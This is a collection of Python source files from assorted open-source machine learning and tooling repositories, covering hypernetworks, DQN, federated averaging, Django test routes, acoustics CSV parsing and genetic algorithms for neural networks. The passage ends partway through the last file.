parameters = self.parameterNet(parameters)
# fill inputNetMatrices with outputs from parameterNet
index = 0
for i in range(len(self.internalNunits)-1):
index_temp = index
index += self.internalNunits[i] * self.internalNunits[i+1]
inputNetMatrices[i] = parameters[:, index_temp:index].reshape(batch_size, self.internalNunits[i+1], self.internalNunits[i])
# fill inputNetBiases with outputs from parameterNet
for i in range(len(self.internalNunits)-1):
index_temp = index
index += self.internalNunits[i+1]
inputNetBiases[i] = parameters[:, index_temp:index].reshape(batch_size, self.internalNunits[i+1], 1)
# MAIN INPUT NETWORK
inputs = self.fcIn(inputs).unsqueeze(-1)
# MAIN INPUT NETWORK
for i in range(len(self.internalNunits)-1):
# apply matrices and biases just filled with outputs from parameterNet
inputs = torch.bmm(inputNetMatrices[i], inputs)
inputs += inputNetBiases[i]
inputs = torch.relu(inputs)
return self.fcOut(inputs.squeeze(-1))
class SplitInputParameterObjective(object):
# define class to smuggle additional arguments into objective function
def __init__(self, train_loader, test_loader, dt_path, input_dim, nparams, output_dim, **modelargs):
self.modelargs = modelargs
self.dt_path = dt_path
self.train_loader = train_loader
self.test_loader = test_loader
self.input_dim = input_dim
self.nparams = nparams
self.output_dim = output_dim
def __call__(self, trial):
lr = trial.suggest_loguniform("lr", 1e-4, 1e-1)
parameterNlayers = trial.suggest_categorical("parameterNlayers", [1, 2, 3, 4, 5])
parameterNunits = []
if parameterNlayers == 1:
parameterNunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
if parameterNlayers == 2:
parameterNunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
if parameterNlayers == 3:
parameterNunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits3", 50, 1000)))
if parameterNlayers == 4:
parameterNunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits3", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits4", 50, 1000)))
if parameterNlayers == 5:
parameterNunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits3", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits4", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits5", 50, 1000)))
internalNlayers = trial.suggest_categorical("internalNlayers", [1, 2, 3, 4, 5])
internalNunits = []
if parameterNlayers == 1:
internalNunits.append(int(trial.suggest_loguniform("iNunits1", 10, 100)))
if parameterNlayers == 2:
internalNunits.append(int(trial.suggest_loguniform("iNunits1", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits2", 10, 100)))
if parameterNlayers == 3:
internalNunits.append(int(trial.suggest_loguniform("iNunits1", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits2", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits3", 10, 100)))
if parameterNlayers == 4:
internalNunits.append(int(trial.suggest_loguniform("iNunits1", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits2", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits3", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits4", 10, 100)))
if parameterNlayers == 5:
internalNunits.append(int(trial.suggest_loguniform("iNunits1", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits2", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits3", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits4", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits5", 10, 100)))
name = f"{self.dt_path}_v{trial.number}" #create name with trial index
value, model_path = physics_aware_training.digital_twin_utils.train_loop_reg_model(
self.train_loader,
self.test_loader,
name,
self.input_dim,
self.nparams,
self.output_dim,
Model = SplitInputParameterNet,
parameterNunits = parameterNunits,
internalNunits = internalNunits,
lr = lr,
**self.modelargs)
trial.set_user_attr('model_path', model_path) #save the model path string in NAS study
return value
|
dusty/commands/shell.py
|
gamechanger/dusty
| 421 |
64245
|
<reponame>gamechanger/dusty
from ..compiler.spec_assembler import get_specs
from . import utils
from ..systems.docker import get_dusty_container_name
def execute_shell(app_or_service_name):
specs = get_specs()
if app_or_service_name not in [spec.name for spec in specs.get_apps_and_services()]:
raise KeyError('No app or service found named {}'.format(app_or_service_name))
exec_options = utils.exec_docker_options()
utils.exec_docker('exec', exec_options, get_dusty_container_name(app_or_service_name), '/bin/bash')
|
Chapter08/07_dqn_distrib.py
|
haohaoxiao/Deep-Reinforcement-Learning-Hands-On-Second-Edition
| 621 |
64258
|
#!/usr/bin/env python3
import gym
import ptan
import argparse
import random
import numpy as np
import torch
import torch.optim as optim
import torch.nn.functional as F
from ignite.engine import Engine
from lib import common, dqn_extra
NAME = "07_distrib"
def calc_loss(batch, net, tgt_net, gamma, device="cpu"):
states, actions, rewards, dones, next_states = \
common.unpack_batch(batch)
batch_size = len(batch)
states_v = torch.tensor(states).to(device)
actions_v = torch.tensor(actions).to(device)
next_states_v = torch.tensor(next_states).to(device)
# next state distribution
next_distr_v, next_qvals_v = tgt_net.both(next_states_v)
next_acts = next_qvals_v.max(1)[1].data.cpu().numpy()
next_distr = tgt_net.apply_softmax(next_distr_v)
next_distr = next_distr.data.cpu().numpy()
next_best_distr = next_distr[range(batch_size), next_acts]
dones = dones.astype(np.bool)
proj_distr = dqn_extra.distr_projection(
next_best_distr, rewards, dones, gamma)
distr_v = net(states_v)
sa_vals = distr_v[range(batch_size), actions_v.data]
state_log_sm_v = F.log_softmax(sa_vals, dim=1)
proj_distr_v = torch.tensor(proj_distr).to(device)
loss_v = -state_log_sm_v * proj_distr_v
return loss_v.sum(dim=1).mean()
if __name__ == "__main__":
random.seed(common.SEED)
torch.manual_seed(common.SEED)
params = common.HYPERPARAMS['pong']
parser = argparse.ArgumentParser()
parser.add_argument("--cuda", default=False, action="store_true", help="Enable cuda")
args = parser.parse_args()
device = torch.device("cuda" if args.cuda else "cpu")
env = gym.make(params.env_name)
env = ptan.common.wrappers.wrap_dqn(env)
env.seed(common.SEED)
net = dqn_extra.DistributionalDQN(env.observation_space.shape, env.action_space.n).to(device)
print(net)
tgt_net = ptan.agent.TargetNet(net)
selector = ptan.actions.EpsilonGreedyActionSelector(epsilon=params.epsilon_start)
epsilon_tracker = common.EpsilonTracker(selector, params)
agent = ptan.agent.DQNAgent(lambda x: net.qvals(x), selector, device=device)
exp_source = ptan.experience.ExperienceSourceFirstLast(
env, agent, gamma=params.gamma)
buffer = ptan.experience.ExperienceReplayBuffer(
exp_source, buffer_size=params.replay_size)
optimizer = optim.Adam(net.parameters(), lr=params.learning_rate)
def process_batch(engine, batch):
optimizer.zero_grad()
loss_v = calc_loss(batch, net, tgt_net.target_model,
gamma=params.gamma, device=device)
loss_v.backward()
optimizer.step()
epsilon_tracker.frame(engine.state.iteration)
if engine.state.iteration % params.target_net_sync == 0:
tgt_net.sync()
return {
"loss": loss_v.item(),
"epsilon": selector.epsilon,
}
engine = Engine(process_batch)
common.setup_ignite(engine, params, exp_source, NAME)
engine.run(common.batch_generator(buffer, params.replay_initial, params.batch_size))
|
library/test/test_compiler/sbs_code_tests/06_funcall_varargs_kwargs.py
|
creativemindplus/skybison
| 278 |
64297
|
<gh_stars>100-1000
# Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
c = (a, b)
d = {e: 1, f: 2}
fun(a, b, *c, **d)
# EXPECTED:
[
...,
BUILD_TUPLE(2),
...,
BUILD_TUPLE_UNPACK_WITH_CALL(2),
...,
CALL_FUNCTION_EX(1),
...,
]
|
tests/urls.py
|
sergioisidoro/django-robots
| 252 |
64299
|
<reponame>sergioisidoro/django-robots<gh_stars>100-1000
import django.contrib.sitemaps.views
import django.views.i18n
import django.views.static
from django.conf import settings
from django.contrib import admin
from django.contrib.sitemaps.views import sitemap as sitemap_view
from django.urls import include
from django.urls import re_path as url
from django.views.decorators.cache import cache_page
urlpatterns = [
url(
r"^media/(?P<path>.*)$",
django.views.static.serve, # NOQA
{"document_root": settings.MEDIA_ROOT, "show_indexes": True},
),
url(r"^admin/", admin.site.urls), # NOQA
url(r"^/", include("robots.urls")), # NOQA
url(r"^sitemap.xml$", sitemap_view, {"sitemaps": []}),
url(
r"^other/sitemap.xml$",
cache_page(60)(sitemap_view),
{"sitemaps": []},
name="cached-sitemap",
),
]
|
acoustics/aio.py
|
cnheider/python-acoustics
| 371 |
64303
|
"""
Cirrus
======
Handle Cirrus data.
"""
import csv
import io
import re
import pandas as pd
def read_csv_cirrus(filename): # pylint: disable=too-many-locals
"""Read a Cirrus CSV file. Currently exists support for some types of
CSV files extracted with NoiseTools. There is no support for CSVs related
with occupational noise.
If there are NC and NR values in the csv file, they will be stored in the
returned object with attributes ``nc`` and ``nr``. If the CSV file contains
time history, you can access to date and time with the ``time`` attribute.
Also, it is possible to know the integration time with the
``integration_time`` attribute.
:param filename: CSV file name.
:returns: Pandas dataframe with all data extracted from the CSV file.
:rtype: Pandas dataframe.
"""
with open(filename, "r") as csvfile:
csvreader = csvfile.read()
csvreader = re.sub(r" dB", "", csvreader) # Clean " dB" from data
dialect = csv.Sniffer().sniff(csvreader, delimiters=",;")
separator = dialect.delimiter
# Guess decimal separator
decimal_sep = re.search(
r"\"\d{2,3}"
r"(\.|,)" # Decimal separator
r"\d{1,2}\"",
csvreader,
).group(1)
n_cols = re.search("(.+)\n", csvreader).group(1).count(separator) + 1
if n_cols < 5:
unsorted_data = []
pdindex = ["Z"]
for i, c in enumerate(csvreader.splitlines()):
if c[:4] == '"NR"':
nr = int(re.search(r"\d{2}", c).group(0))
continue
elif c[:4] == '"NC"':
nc = int(re.search(r"\d{2}", c).group(0))
continue
if i != 0:
unsorted_data.append(c.split(separator))
else:
if n_cols == 3:
pdindex.append(c[-2:-1])
elif n_cols == 4:
pdindex.append("A")
pdindex.append("C")
# Create a sorted temporary csv-like file
csv_data = list(zip(*unsorted_data))
temp_csv = ""
for row in csv_data:
temp_csv += separator.join(row) + "\n"
# Then, read it with pandas
data = pd.read_csv(
io.StringIO(temp_csv),
sep=separator,
decimal=decimal_sep,
)
# Assign NC and NR data if they are present
try:
data.nc = nc
data.nr = nr
# TODO specify exception type:
except: # pylint: disable=bare-except
pass
# If the csv file contains global data from the "Details" tab in
# NoiseTools, skip row names
if n_cols != 2:
data.index = pdindex
else:
data = pd.read_csv(
filename,
parse_dates=[[0, 1]],
sep=separator,
decimal=decimal_sep,
)
# Fix time name column
en_columns = data.columns.values
en_columns[0] = "time"
data.columns = en_columns
# Guess integration time with statistical mode because the csv could
# have been cleaned from unwanted noise
data["time"] = pd.to_datetime(data.time)
delta = data.time.diff().fillna(0.0)
# Mode and change from ns to s
int_time = int(delta.mode().astype(int) * 1e-9)
if round(int_time, 2) == 0.06: # Fix for 1/16 s
int_time = 0.0625
data.integration_time = int_time
return data
|
tensorflow_federated/python/examples/stateful_clients/stateful_fedavg_tf.py
|
zhihansh/federated-oss
| 1,918 |
64328
|
<reponame>zhihansh/federated-oss
# Copyright 2020, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An implementation of the FedAvg algorithm with stateful clients.
The TF functions for sever and client udpates.
"""
import collections
from typing import Union
import attr
import tensorflow as tf
import tensorflow_federated as tff
ModelWeights = collections.namedtuple('ModelWeights', 'trainable non_trainable')
ModelOutputs = collections.namedtuple('ModelOutputs', 'loss')
def get_model_weights(
model: Union[tff.learning.Model, 'KerasModelWrapper']
) -> Union[tff.learning.ModelWeights, ModelWeights]:
"""Gets the appropriate ModelWeights object based on the model type."""
if isinstance(model, tff.learning.Model):
return tff.learning.ModelWeights.from_model(model)
else:
# Using simple_fedavg custom Keras wrapper.
return model.weights
class KerasModelWrapper(object):
"""A standalone keras wrapper to be used in TFF."""
def __init__(self, keras_model, input_spec, loss):
"""A wrapper class that provides necessary API handles for TFF.
Args:
keras_model: A `tf.keras.Model` to be trained.
input_spec: Metadata of dataset that desribes the input tensors, which
will be converted to `tff.Type` specifying the expected type of input
and output of the model.
loss: A `tf.keras.losses.Loss` instance to be used for training.
"""
self.keras_model = keras_model
self.input_spec = input_spec
self.loss = loss
def forward_pass(self, batch_input, training=True):
"""Forward pass of the model to get loss for a batch of data.
Args:
batch_input: A `collections.abc.Mapping` with two keys, `x` for inputs and
`y` for labels.
training: Boolean scalar indicating training or inference mode.
Returns:
A scalar tf.float32 `tf.Tensor` loss for current batch input.
"""
preds = self.keras_model(batch_input['x'], training=training)
loss = self.loss(batch_input['y'], preds)
return ModelOutputs(loss=loss)
@property
def weights(self):
return ModelWeights(
trainable=self.keras_model.trainable_variables,
non_trainable=self.keras_model.non_trainable_variables)
def from_weights(self, model_weights):
tf.nest.map_structure(lambda v, t: v.assign(t),
self.keras_model.trainable_variables,
list(model_weights.trainable))
tf.nest.map_structure(lambda v, t: v.assign(t),
self.keras_model.non_trainable_variables,
list(model_weights.non_trainable))
def keras_evaluate(model, test_data, metric):
metric.reset_states()
for batch in test_data:
preds = model(batch['x'], training=False)
metric.update_state(y_true=batch['y'], y_pred=preds)
return metric.result()
@attr.s(eq=False, frozen=True, slots=True)
class ClientState(object):
"""Structure for state on the client.
Fields:
- `client_index`: The client index integer to map the client state back to
the database hosting client states in the driver file.
- `iters_count`: The number of total iterations a client has computed in
the total rounds so far.
"""
client_index = attr.ib()
iters_count = attr.ib()
@attr.s(eq=False, frozen=True, slots=True)
class ClientOutput(object):
"""Structure for outputs returned from clients during federated optimization.
Fields:
- `weights_delta`: A dictionary of updates to the model's trainable
variables.
- `client_weight`: Weight to be used in a weighted mean when
aggregating `weights_delta`.
- `model_output`: A structure matching
`tff.learning.Model.report_local_outputs`, reflecting the results of
training on the input dataset.
- `client_state`: The updated `ClientState`.
"""
weights_delta = attr.ib()
client_weight = attr.ib()
model_output = attr.ib()
client_state = attr.ib()
@attr.s(eq=False, frozen=True, slots=True)
class ServerState(object):
"""Structure for state on the server.
Fields:
- `model_weights`: A dictionary of model's trainable variables.
- `optimizer_state`: Variables of optimizer.
- 'round_num': Current round index
- `total_iters_count`: The total number of iterations run on seen clients
"""
model_weights = attr.ib()
optimizer_state = attr.ib()
round_num = attr.ib()
total_iters_count = attr.ib()
@attr.s(eq=False, frozen=True, slots=True)
class BroadcastMessage(object):
"""Structure for tensors broadcasted by server during federated optimization.
Fields:
- `model_weights`: A dictionary of model's trainable tensors.
- `round_num`: Round index to broadcast. We use `round_num` as an example to
show how to broadcast auxiliary information that can be helpful on
clients. It is not explicitly used, but can be applied to enable
learning rate scheduling.
"""
model_weights = attr.ib()
round_num = attr.ib()
@tf.function
def server_update(model, server_optimizer, server_state, weights_delta,
total_iters_count):
"""Updates `server_state` based on `weights_delta`.
Args:
model: A `KerasModelWrapper` or `tff.learning.Model`.
server_optimizer: A `tf.keras.optimizers.Optimizer`. If the optimizer
creates variables, they must have already been created.
server_state: A `ServerState`, the state to be updated.
weights_delta: A nested structure of tensors holding the updates to the
trainable variables of the model.
total_iters_count: A scalar to update `ServerState.total_iters_count`.
Returns:
An updated `ServerState`.
"""
# Initialize the model with the current state.
model_weights = get_model_weights(model)
tf.nest.map_structure(lambda v, t: v.assign(t), model_weights,
server_state.model_weights)
tf.nest.map_structure(lambda v, t: v.assign(t), server_optimizer.variables(),
server_state.optimizer_state)
# Apply the update to the model.
neg_weights_delta = [-1.0 * x for x in weights_delta]
server_optimizer.apply_gradients(
zip(neg_weights_delta, model_weights.trainable), name='server_update')
# Create a new state based on the updated model.
return tff.structure.update_struct(
server_state,
model_weights=model_weights,
optimizer_state=server_optimizer.variables(),
round_num=server_state.round_num + 1,
total_iters_count=total_iters_count)
@tf.function
def build_server_broadcast_message(server_state):
"""Build `BroadcastMessage` for broadcasting.
This method can be used to post-process `ServerState` before broadcasting.
For example, perform model compression on `ServerState` to obtain a compressed
state that is sent in a `BroadcastMessage`.
Args:
server_state: A `ServerState`.
Returns:
A `BroadcastMessage`.
"""
return BroadcastMessage(
model_weights=server_state.model_weights,
round_num=server_state.round_num)
@tf.function
def client_update(model, dataset, client_state, server_message,
client_optimizer):
"""Performans client local training of `model` on `dataset`.
Args:
model: A `tff.learning.Model`.
dataset: A 'tf.data.Dataset'.
client_state: A 'ClientState'.
server_message: A `BroadcastMessage` from server.
client_optimizer: A `tf.keras.optimizers.Optimizer`.
Returns:
A 'ClientOutput`.
"""
model_weights = get_model_weights(model)
initial_weights = server_message.model_weights
tf.nest.map_structure(lambda v, t: v.assign(t), model_weights,
initial_weights)
num_examples = tf.constant(0, dtype=tf.int32)
loss_sum = tf.constant(0, dtype=tf.float32)
iters_count = tf.convert_to_tensor(client_state.iters_count)
for batch in dataset:
with tf.GradientTape() as tape:
outputs = model.forward_pass(batch)
grads = tape.gradient(outputs.loss, model_weights.trainable)
client_optimizer.apply_gradients(zip(grads, model_weights.trainable))
batch_size = (tf.shape(batch['x'])[0])
num_examples += batch_size
loss_sum += outputs.loss * tf.cast(batch_size, tf.float32)
iters_count += 1
weights_delta = tf.nest.map_structure(lambda a, b: a - b,
model_weights.trainable,
initial_weights.trainable)
client_weight = tf.cast(num_examples, tf.float32)
return ClientOutput(
weights_delta, client_weight, loss_sum / client_weight,
ClientState(
client_index=client_state.client_index, iters_count=iters_count))
|
colossalai/engine/schedule/_non_pipeline_schedule.py
|
RichardoLuo/ColossalAI
| 1,630 |
64337
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
from typing import Iterable
import torch
from ._base_schedule import BaseSchedule
from colossalai.utils import conditional_context
class NonPipelineSchedule(BaseSchedule):
"""A helper schedule class for no pipeline parallelism running environment.
During one process, it loads a batch of dataset and feeds it to the model.
After getting the output and calculating the loss, it will use :meth:`step`
to update the parameters if it is in training mode.
Args:
batch_data_process_func (Callable, optional): The preprocessing function which receives a batch of data,
and it will be executed in load_batch.
"""
def forward_backward_step(self,
engine,
data_iter: Iterable,
forward_only: bool = False,
return_loss: bool = True,
return_output_label: bool = True):
"""The process function that loads a batch of dataset and feeds it to the model.
The returned labels and loss will None if :attr:`return_loss` is False.
Args:
engine (colossalai.engine.Engine): Colossalai engine for training and inference.
data_iter (Iterable): Dataloader as the form of an iterator, obtained by calling iter(dataloader).
forward_only (bool, optional):
If True, the model is run for the forward pass, else back propagation will be executed.
return_loss (bool, optional): Loss will be returned if True.
return_output_label (bool, optional): Output and label will be returned if True.
Returns:
Tuple[:class:`torch.Tensor`]: A tuple of (output, label, loss), loss and label could be None.
"""
assert forward_only or return_loss, \
"The argument 'return_loss' has to be True when 'forward_only' is False, but got False."
data, label = self.load_batch(data_iter)
# forward
with conditional_context(torch.no_grad(), enable=forward_only):
output = self._call_engine(engine, data)
if return_loss:
loss = self._call_engine_criterion(engine, output, label)
if not forward_only:
engine.backward(loss)
if return_output_label:
if return_loss:
return output, label, loss
else:
return output, label, None
else:
if return_loss:
return None, None, loss
else:
return None, None, None
|
examples/genetic_rl.py
|
matrig/genrl
| 390 |
64349
|
<reponame>matrig/genrl<filename>examples/genetic_rl.py<gh_stars>100-1000
import argparse
from genrl import A2C, PPO1
from genrl.deep.common import OnPolicyTrainer
from genrl.deep.common.actor_critic import MlpActorCritic
from genrl.deep.common.utils import get_env_properties
from genrl.environments import VectorEnv
from genrl.evolutionary import GeneticHyperparamTuner
# """
# Okay so parameters to tune:-
# - layers
# - lr_policy
# - lr_value
# - clip param
# - entropy coeff
# - value coeff
# - gamma
# """
def get_logger(log):
if "," not in log:
return [log]
else:
log = log.split(",")
if "" in log or " " in log:
log = [i for i in log if i != ""]
log = [i for i in log if i != " "]
return log
# Code inspired from https://github.com/harvitronix/neural-network-genetic-algorithm
class GATuner(GeneticHyperparamTuner):
def fitness(self, agent):
"""
Return the mean rewards, which is our fitness function
"""
return agent.get_logging_params()["mean_reward"]
def train_population(agents, envirnment, args):
"""
Train all the agents in the population
Args:
agents (List) : List of agent
envirnment: Gym envirnment
"""
logger = get_logger(args.log)
for agent in agents:
trainer = OnPolicyTrainer(
agent,
envirnment,
logger,
epochs=args.epochs,
render=args.render,
log_interval=args.log_interval,
)
trainer.train()
del trainer
print("-" * 80)
def generate(
generations, no_of_parents, agent_parameter_choices, envirnment, generic_agent, args
):
"""
Genetic Algorithm for RL
Args:
generations (int): No of generations
no_of_parents(int): No of agents in a generation
agent_parameter_choices(Dict): Parameter choices for the agent
envirnment: Gym Envirnment
generic_agent : RL Agent to be tuned
"""
optimizer = GATuner(agent_parameter_choices)
agents = optimizer.initialize_population(no_of_parents, generic_agent)
# evolve the generation
for i in range(generations):
print(f"Doing generation {i}/{generations}")
# Train the agents
train_population(agents, envirnment, args)
# get average fitness of the generation
avg_reward = optimizer.grade(agents)
print(f"Generation avg reward:{avg_reward}")
print("-" * 50)
# Evolve the generation
if i != generations - 1:
agents = optimizer.evolve(agents)
# sort our final population
agents = sorted(agents, key=lambda x: optimizer.fitness(x), reverse=True)
# print rewards of top 5
for i in range(5):
print(f"Top {i+1} agent reward: {optimizer.fitness(agents[i])}")
def main(args):
env = VectorEnv(
args.env, n_envs=args.n_envs, parallel=not args.serial, env_type=args.env_type
)
input_dim, action_dim, discrete, action_lim = get_env_properties(env, "mlp")
network = MlpActorCritic(
input_dim,
action_dim,
(1, 1), # layers
(1, 1),
"V", # type of value function
discrete,
action_lim=action_lim,
activation="relu",
)
generic_agent = A2C(network, env, rollout_size=args.rollout_size)
agent_parameter_choices = {
"gamma": [12, 121],
# 'clip_param': [0.2, 0.3],
# 'lr_policy': [0.001, 0.002],
# 'lr_value': [0.001, 0.002]
}
generate(
args.generations,
args.population,
agent_parameter_choices,
env,
generic_agent,
args,
)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Train Deep RL algorithms")
# parser.add_argument("-a", "--algo", help="Which Algo to train", default="ppo", type=str)
parser.add_argument(
"-e", "--env", help="Which env to train on", default="CartPole-v0", type=str
)
parser.add_argument(
"--env-type", help="What kind of env is it", default="gym", type=str
)
parser.add_argument(
"-n",
"--n-envs",
help="Number of vectorized envs to train on",
default=2,
type=int,
)
parser.add_argument(
"--serial",
help="Vectorized envs should be serial or parallel",
default=True,
type=bool,
)
parser.add_argument(
"--epochs", help="How many epochs to train on", default=20, type=int
)
parser.add_argument(
"--render",
help="Should the env be rendered",
default=False,
action="store_true",
)
parser.add_argument(
"--log", help="Comma separated string of logs", default="stdout", type=str
)
parser.add_argument(
"--arch", help="Which architecture mlp/cnn for now", default="mlp", type=str
)
parser.add_argument("--log-interval", help="Set Log interval", default=50, type=int)
parser.add_argument("--batch-size", help="Batch Size", default=128, type=int)
parser.add_argument(
"--population", help="No. of agents in a generation", default=10, type=int
)
parser.add_argument("--generations", help="No. of generations", default=5, type=int)
offpolicyargs = parser.add_argument_group("Off Policy Args")
offpolicyargs.add_argument(
"-ws", "--warmup-steps", help="Warmup steps", default=10000, type=int
)
offpolicyargs.add_argument(
"--replay-size", help="Replay Buffer Size", default=1000, type=int
)
onpolicyargs = parser.add_argument_group("On Policy Args")
onpolicyargs.add_argument(
"--rollout-size", help="Rollout Buffer Size", default=2048, type=int
)
args = parser.parse_args()
main(args)
|
examples/genetic_alg/simple_gen.py
|
AravindaDP/gym-donkeycar
| 106 |
64354
|
"""
file: simple_gen.py
author: <NAME>
date: 17 May 2020
notes: a most basic implementation of genetic cross breeding and mutation to attempt to improve
a neural network. Assumes the standard Keras model from Donkeycar project.
Lower score means less loss = better.
"""
import argparse
import json
import os
import time
import warnings
import numpy as np
from PIL import Image
# noisy, noisy tensorflow. we love you.
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=FutureWarning)
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
class IAgent:
def begin(self):
pass
def wait(self):
pass
def get_score(self):
pass
def make_new(self, parent1, parent2):
return IAgent()
class GeneticAlg:
def __init__(self, population, conf={}):
self.population = population
self.conf = conf
def finished(self):
return False
def process(self, num_iter):
iIter = 0
while not self.finished() and iIter < num_iter:
print("starting epoch", iIter)
s = time.time()
self.evaluate_agents()
self.on_agents_finished()
e = time.time() - s
self.breed_agents()
iIter += 1
d = time.time() - s
# Time per iteration getting worse?!
print("finish epoch", iIter)
print("Iter %d eval time: %f total time: %f" % (iIter, e, d))
def on_agents_finished(self):
pass
def evaluate_agents(self):
for agent in self.population:
agent.begin()
for agent in self.population:
agent.wait()
self.sort_agents()
# progress
print("scores:", [a.score for a in self.population])
def how_many_to_keep(self):
return round(len(self.population) / 4) + 1
def breed_agents(self):
"""
keep the best N of our population and replace the rest
with versions cross bred from other agents.
"""
keep = self.how_many_to_keep()
num_new = len(self.population) - keep
pop_to_keep = self.population[0:keep]
new_population = []
for _ in range(num_new):
p1, p2 = self.select_parents()
new_agent = p1.make_new(p1, p2)
new_agent.mutate()
new_population.append(new_agent)
self.population = pop_to_keep + new_population
def sort_agents(self):
self.population.sort(key=lambda x: x.get_score(), reverse=False)
def select_pop_index(self):
r = np.random.uniform(low=0.0, high=1.0)
N = len(self.population)
iP = round(r * N) % N
return iP
def select_parents(self):
iP1 = self.select_pop_index()
iP2 = self.select_pop_index()
# hack, always select the best 2
# iP1 = 0
# iP2 = 1
# lets make sure parents are not the same
while iP2 == iP1:
iP2 = self.select_pop_index()
return self.population[iP1], self.population[iP2]
class NNAgent(IAgent):
def __init__(self, model, conf):
self.model = model
self.score = 0.0
self.conf = conf
def begin(self):
self.score = 0.0
def wait(self):
pass
def get_score(self):
return self.score
def mutate(self):
pass
def breed(self, agent1, agent2):
return agent1.model
def make_new(self, parent1, parent2):
new_model = self.breed(parent1, parent2)
agent = NNAgent(new_model, self.conf)
agent.mutate()
return agent
class KerasNNAgent(NNAgent):
def __init__(self, model, conf):
super().__init__(model, conf)
self.mutation_rate = conf["mutation_rate"]
def mutate(self):
layers_to_mutate = self.conf["layers_to_mutate"]
for iLayer in layers_to_mutate:
layer = self.model.get_layer(index=iLayer)
w = layer.get_weights()
self.modify_weights(w)
layer.set_weights(w)
self.decay_mutations()
def rand_float(self, mn, mx):
return float(np.random.uniform(mn, mx, 1)[0])
def modify_weights(self, w):
mx = self.conf["mutation_max"]
mn = self.conf["mutation_min"]
mag = self.rand_float(mn, mx)
for iArr, arr in enumerate(w):
val = self.rand_float(0.0, 1.0)
if val > self.mutation_rate:
continue
random_values = np.random.uniform(-mag, mag, arr.shape)
arr = arr + random_values
w[iArr] = arr
return w
def decay_mutations(self):
self.conf["mutation_max"] *= self.conf["mutation_decay"]
def breed(self, agent1, agent2):
model1, model2 = agent1.model, agent2.model
jsm = model1.to_json()
new_model = tf.keras.models.model_from_json(jsm)
new_model.set_weights(model1.get_weights())
iLayers = self.conf["layers_to_combine"]
for iLayer in iLayers:
layer1 = model1.get_layer(index=iLayer)
layer2 = model2.get_layer(index=iLayer)
final_layer = new_model.get_layer(index=iLayer)
self.merge_layers(final_layer, layer1, layer2)
return new_model
def merge_layers(self, dest_layer, src1_layer, src2_layer):
w1 = src1_layer.get_weights()
w2 = src2_layer.get_weights()
res = w1.copy()
if type(w1) is list:
half = round(len(w1) / 2)
res[half:-1] = w2[half:-1]
else:
l_indices = np.tril_indices_from(w2)
res[l_indices] = w2[l_indices]
dest_layer.set_weights(res)
class KerasNNImageAgent(KerasNNAgent):
"""
Given an image and a target prediction, make an agent that will
optimize for score of target.
"""
def __init__(self, model, conf):
super().__init__(model, conf)
self.image = conf["image"]
self.target = conf["target"]
def begin(self):
pred = self.model.predict(self.image)
self.score = np.sum(np.absolute(pred - self.target))
def make_new(self, parent1, parent2):
new_model = self.breed(parent1, parent2)
agent = KerasNNImageAgent(new_model, self.conf)
agent.mutate()
return agent
def test_image_agent(model_filename, record_filename, num_agents, num_iter):
with open(os.path.expanduser(record_filename), "r") as fp:
record = json.load(fp)
img_filename = os.path.join(os.path.dirname(record_filename), record["cam/image_array"])
img = Image.open(os.path.expanduser(img_filename))
img_arr = np.array(img)
# Our model was trained with this normalization scale on data.
one_byte_scale = 1.0 / 255.0
img_arr = img_arr.astype(np.float32) * one_byte_scale
img_arr = img_arr.reshape((1,) + img_arr.shape)
steering = record["user/angle"]
throttle = record["user/throttle"]
target = np.array([np.array([[steering]]), np.array([[throttle]])])
# These are the final two dense layers we will mutate. We will use the same two layers we breeding.
to_mutate = [14, 16]
conf = {"layers_to_mutate": to_mutate}
conf["layers_to_combine"] = to_mutate
conf["mutation_rate"] = 1.0
conf["mutation_max"] = 0.3
conf["mutation_min"] = 0.0
conf["mutation_decay"] = 1.0
conf["image"] = img_arr
conf["target"] = target
population = []
for i in range(num_agents):
model = tf.keras.models.load_model(os.path.expanduser(model_filename))
agent = KerasNNImageAgent(model, conf)
if i > 0:
agent.mutate()
population.append(agent)
# Some initial state
print("target: steering: %f throttle: %f" % (target[0][0][0], target[1][0][0]))
agent = population[0]
agent.begin()
print("initial score:", agent.score)
pred = agent.model.predict(img_arr)
print("initial pred", pred[0][0], pred[1][0])
# Try to improve
alg = GeneticAlg(population)
alg.process(num_iter=num_iter)
# Our best agent
